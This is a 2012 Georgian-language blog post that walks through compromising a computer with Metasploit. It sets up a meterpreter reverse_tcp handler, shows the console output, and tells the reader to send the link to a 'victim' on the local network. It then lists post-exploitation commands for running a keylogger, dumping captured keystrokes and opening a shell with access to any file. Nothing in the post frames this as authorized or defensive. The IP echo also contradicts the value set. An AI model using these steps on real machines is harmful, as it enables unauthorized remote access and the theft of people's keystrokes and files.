Thursday, December 13, 2012

მოგესალმებით ყველას, დღეს აგიხსნით ძალიან მარტივად კომპიუტერის გატეხვას მეტასპლოიტის საშუალებით. მაშ ასე დავიწყოთ:

ნაბიჯი #1 : ვხსნით მეტასპლოიტის კონსოლს და ვწერთ შემდეგ რაღაცას
use exploit/multi/handler

ბანიჯი #2 : ამის შემდეგ ვწერთ ესეთ რამეს
set PAYLOAD windows/meterpreter/reverse_tcp  და უნდა დაწეროს ესეთი რამ
PAYLOAD => windows/meterpreter/reverse_tcp

ნაბიჯი  #3 : ვწერ ესეთ რამეს set LHOST 192.168.1.107 ჩემ შემთხვევაში ესაა შიდა IP თქვენ შემთხვევაში სხვანაერად იქნება (შიდა IP-ს ვიყენებთ თუ LOCAL-ში ვჩალიჩობთ და თუ GLOBAL-ში მაშინ გარე IP-ს ვიყენებთ)
ამის შემდეგ უნდა დაწეროს ესეთი რამ LHOST => 192.168.255.130 

ნაბიჯი #4 : ვწერ ესეთ რამეს set LPORT 4444 ამის დაწერის მერე უნდა გამოიტანოს ესეთი რამ LPORT => 4444 (იმისათვის რომ 4444 პორტზე დაგიკავშირდნენ გლობალიდან, გახსნილი უნდა გქონდეთ ეს პორტი)

ნაბიჯი #5 :  როდესაც ამ ყველაფერს ვიზავთ უნდა დავწეროთ ესეთი ბრძანება exploit

თუ ყველაფერი ზუსტათ გააკეთეთ მაშინ უნდა დაწეროს შემდეგი რამ :

[*] Started reverse handler on 192.168.1.107:4444
[*] Starting the payload handler...  
თუ ესეთირ ამ დაგიწერათ ესეგი ის ელოდება მსხვერპლის ამ მისამართზე შესვლას მივცეთ ეს ლინკი რომელიმე LAN-ში მყოფ იუზერს და როდესაც გასნის ტექსტი გაგრძელდება და დაეწერება ესეთი რამ :

[*] Sending stage (749056 bytes) to 192.168.1.107
[*] Meterpreter session 1 opened (192.168.1.107:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

(192.168.255.1:62853 ეს IP არის მსხვერპლის შიდა IP) ანუ მსხვერპლი დაგვიკავშირდა ))

ამ ყველაფრის შემდეგ დაგვიწერს ესეთ რამეს: 
meterpreter > 

ამის შემდეგ ჩვენ შეგვილია ბევრი ბრძანება ჩავწეროთ მაგ:
1) ps - ამ ბრძანებით ვნახავთ თურ ა პროცესებია გაშვებული
2) keyscan_start - ამ ბრძანებით ტქვენ ჩართავთ ქეილოგერს
3) shell - ამ ბრძანებით კი თქვენ გექნებათ კომპიუტერის ნებისმიერ ფოლდერში და ნებისმიერ დოკუმენტზე წვდომა იგივე სახისაა რაც (CMD) 
4) keyscan_dump - ეს ბრძანება არის იმისთვის რომ რაც ქეილოგერმა დააფიქსირა ისინი განახოთ ))

ვსო სულ ეს იყო)) წარმატებებს გისურვებთ ყველას ./RoBBeR       
  

No comments:

Post a Comment